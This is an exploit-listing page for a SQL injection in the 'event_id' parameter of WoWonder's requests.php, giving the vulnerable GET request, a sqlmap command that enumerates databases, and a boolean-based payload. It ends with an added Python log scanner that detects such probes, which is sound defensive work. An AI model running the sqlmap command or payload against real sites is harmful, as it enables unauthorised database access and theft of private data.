WoWonder Social Network Platform 3.1 event_id SQL Injection

CVE: CVE-2021-27069
Category: CWE-89
Price: $3,000
Severity: High
Author: SunCSR Team
Risk: Critical
Exploitation Type: Remote
Date: 2021-03-24
Our sensors found this exploit at:

Below is a copy:

# Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
# Date: 16.03.2021
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: < 3.1
# Tested on: Linux/Windows


In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.

The vulnerability lies in the "event_id" parameter of a GET request sent to the requests.php page; the value is passed into a SQL query without proper validation or parameterisation.

If an attacker exploits this vulnerability, they may read private data held in the database.


# GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
# Host: Target

Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs

Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF
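As an added defender-side example (not part of the advisory and not WoWonder's own code), the following Python scans web-server access logs for requests to requests.php whose event_id is not a plain integer id and flags the quote-and-boolean probe form seen in the payload above; the log format, IPs and sample lines are constructed assumptions.

```python
"""Flag SQL injection probes against the event_id parameter of requests.php
in access logs. Added example; sample log lines below are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed common-log-format lines: one legitimate request, a true/false
# boolean pair from one client (same status, different body size), and noise.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2021:10:00:01 +0000] "GET /requests.php?hash=abc&f=search-my-followers&filter=s4e&event_id=17 HTTP/1.1" 200 512
10.0.0.9 - - [24/Mar/2021:10:00:02 +0000] "GET /requests.php?hash=abc&f=search-my-followers&filter=s4e&event_id=1%27%29%20AND%205376%3D5376--%20QYxF HTTP/1.1" 200 512
10.0.0.9 - - [24/Mar/2021:10:00:03 +0000] "GET /requests.php?hash=abc&f=search-my-followers&filter=s4e&event_id=1%27%29%20AND%205376%3D5377--%20QYxF HTTP/1.1" 200 498
10.0.0.7 - - [24/Mar/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)')
ID_RE = re.compile(r'\d{1,18}')            # an event id is an integer key
# Closing quote/paren followed by a boolean operator, or a SQL comment marker.
PROBE_RE = re.compile(r"""['"]\s*\)?\s*(?:AND|OR)\b|--""", re.IGNORECASE)


def classify_event_id(value):
    """Return None for a well-formed id, else a short reason string."""
    if ID_RE.fullmatch(value):
        return None
    if PROBE_RE.search(value):
        return 'boolean-based sqli pattern'
    return 'non-numeric event_id'


def scan_log(text):
    """Yield findings for requests.php calls whose event_id fails validation."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if url.path != '/requests.php':
            continue
        # parse_qs percent-decodes, so the stored value is what the app saw.
        for raw in parse_qs(url.query, keep_blank_values=True).get('event_id', []):
            reason = classify_event_id(raw)
            if reason:
                findings.append({'ip': m['ip'], 'status': m['status'],
                                 'size': int(m['size']), 'reason': reason,
                                 'value': raw})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A true/false pair from one client with identical status but differing body size, as in the two flagged lines, is the signature of blind boolean inference; the fix on the server side is to reject any event_id that fails the integer check before it reaches a query.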

